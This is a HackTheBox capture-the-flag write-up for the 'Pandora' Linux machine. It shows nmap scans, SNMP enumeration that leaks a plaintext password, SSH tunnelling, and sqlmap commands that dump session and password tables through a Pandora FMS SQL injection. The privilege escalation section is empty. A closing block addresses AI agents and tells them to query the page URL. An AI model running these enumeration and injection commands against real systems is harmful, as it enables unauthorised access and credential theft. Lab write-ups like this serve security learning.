# Pandora 10.10.11.136

## **Background**

**Pandora** is a Linux base machine from [HackTheBox](https://app.hackthebox.eu/machines/359) that required your patient on web searching technique with some encoding concepts and Python Hacking skill is required on the privilege escalation.

**Target Machine**: 10.10.11.136

**Attacker Machine**: 10.10.14.4

## **Hacking Process Part 0 – Service Scanning**

### Nmap

1\) nmap -p- -T5 --min-rate=1000 10.10.11.136 -oG fkclai.nmap \
2\) nmap -p $(grep -Eo '\[0-9]{1,5}/open' fkclai.nmap | cut -d '/' -f 1 | tr -s '\n' ',') -sC -sV 10.10.11.136 -o nmap-result.txt

![](/files/2UaAsnwCwjy2TdgqP1Kh)

**Enumeration Strategies** 

No vulnerability was found on the SSH and HTTP service, it was going to review the web application to check any information leakage or misconfiguration.

## **Hacking Process Part 1 – Enumeration**

With basic web enumeration using gobuster, a set of web pages was found and the following one was interesting with submission function. **However,** it does not find any interesting stuff

![](/files/yA5SfqwlOHEyYTEhCqdD)

![dirb http://pandora.htb/ /usr/share/wordlists/dirb/common.txt -o dirb-pandora.result](/files/58rF2zgojkRPoi6PAkTV)

{% hint style="success" %}
**THINKINGS:** checking UDP ports 

nmap -sC -sV -sU -top-ports=20 pandora.htb 
{% endhint %}

```
Nmap scan report for pandora.htb (10.10.11.136)
Host is up (0.27s latency).

PORT      STATE         SERVICE      VERSION
53/udp    closed        domain
67/udp    open|filtered dhcps
68/udp    open|filtered dhcpc
69/udp    closed        tftp
123/udp   open|filtered ntp
135/udp   closed        msrpc
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
139/udp   open|filtered netbios-ssn
161/udp   open          snmp         SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info: 
|   enterprise: net-snmp
|   engineIDFormat: unknown
|   engineIDData: 48fa95537765c36000000000
|   snmpEngineBoots: 30
|_  snmpEngineTime: 20m46s
| snmp-processes: 
|   1: 
| 
|   2: 
| 
|   3: 
| 
|_  4: 
| snmp-sysdescr: Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
|_  System uptime: 20m46.36s (124636 timeticks)
|_snmp-win32-software: 
162/udp   open|filtered snmptrap
445/udp   open|filtered microsoft-ds
500/udp   open|filtered isakmp
514/udp   open|filtered syslog
520/udp   closed        route
631/udp   closed        ipp
1434/udp  open|filtered ms-sql-m
1900/udp  open|filtered upnp
4500/udp  open|filtered nat-t-ike
49152/udp open|filtered unknown
Service Info: Host: pandora

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.89 seconds
```

Checking the opening port one by one

#### SNMP Port 161 

{% embed url="<https://book.hacktricks.xyz/pentesting/pentesting-snmp>" %}

```
// using the command snmpwalk
snmpwalk -v 2c pandora.htb -c public> smpwalk.result

iso.3.6.1.2.1.25.4.2.1.5.870 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
```

Get a username  `daniel`and password  `HotelBabylon23,` try the SSH connection with this account

![](/files/pUDOpPefGg0OYTpBhbHD)

## **Hacking Process Part 2  –** Gaining Foothold

Get the Initial access using the credential found at the SNMP connection string

![](/files/mHKNIQhhYNeJUtMNEZp3)

Unfortunately, the account cannot access the user.txt

<div align="left"><img src="/files/xhVoAwd9EntHvSw33YIR" alt=""></div>

After reviewing the network, it found that there should be a website hosted internally, but it cannot be accessed outside.

![](/files/Zus0cudOEeuT6JCFoXqE)

Try to use SSH tunnelling to redirect the page outside&#x20;

![ssh -L 81:127.0.0.1:80 daniel@pandora.htb](/files/LIKOIAgPlTILQCGz00F8)

![The credential found before cannot login this website](/files/q5ZRXXQPhkCgzUCFPkrs)

A [CVE-2020-5844 ](https://nvd.nist.gov/vuln/detail/CVE-2020-26518#range-6019001)was found on this v7.0NG.742\_FIX\_PERL2020, SQL injection vulnariblity was found. Using SQLMap to check the&#x20;

<div align="left"><img src="/files/jJmkIKKZlju5z2hx43oA" alt=""></div>

![sqlmap -u "http://127.0.0.1:81/pandora\_console/include/chart\_generator.php?session\_id=1" --batch --dbms=mysql -D pandora -T tsessions\_php -C id\_session,data --dump](/files/JawQNHYGU3avmR58kPyZ)

It was found that the name of Database: pandora, table tsessions\_php, and related field identified. Changed the command and executed it again

![sqlmap -u "http://127.0.0.1:81/pandora\_console/include/chart\_generator.php?session\_id=1" --batch --dbms=mysql -D pandora -T tpassword\_history -C id\_pass,id\_user,data\_end,password,data\_begin --dump](/files/cChV8s96569FkFEVtzmi)

## **Hacking Process Part 3 –** Privilege Escalation


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://calvin-lai.gitbook.io/calvin-lai-security/hack-the-box-writeup/linux-machine/pandora-10.10.11.136.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.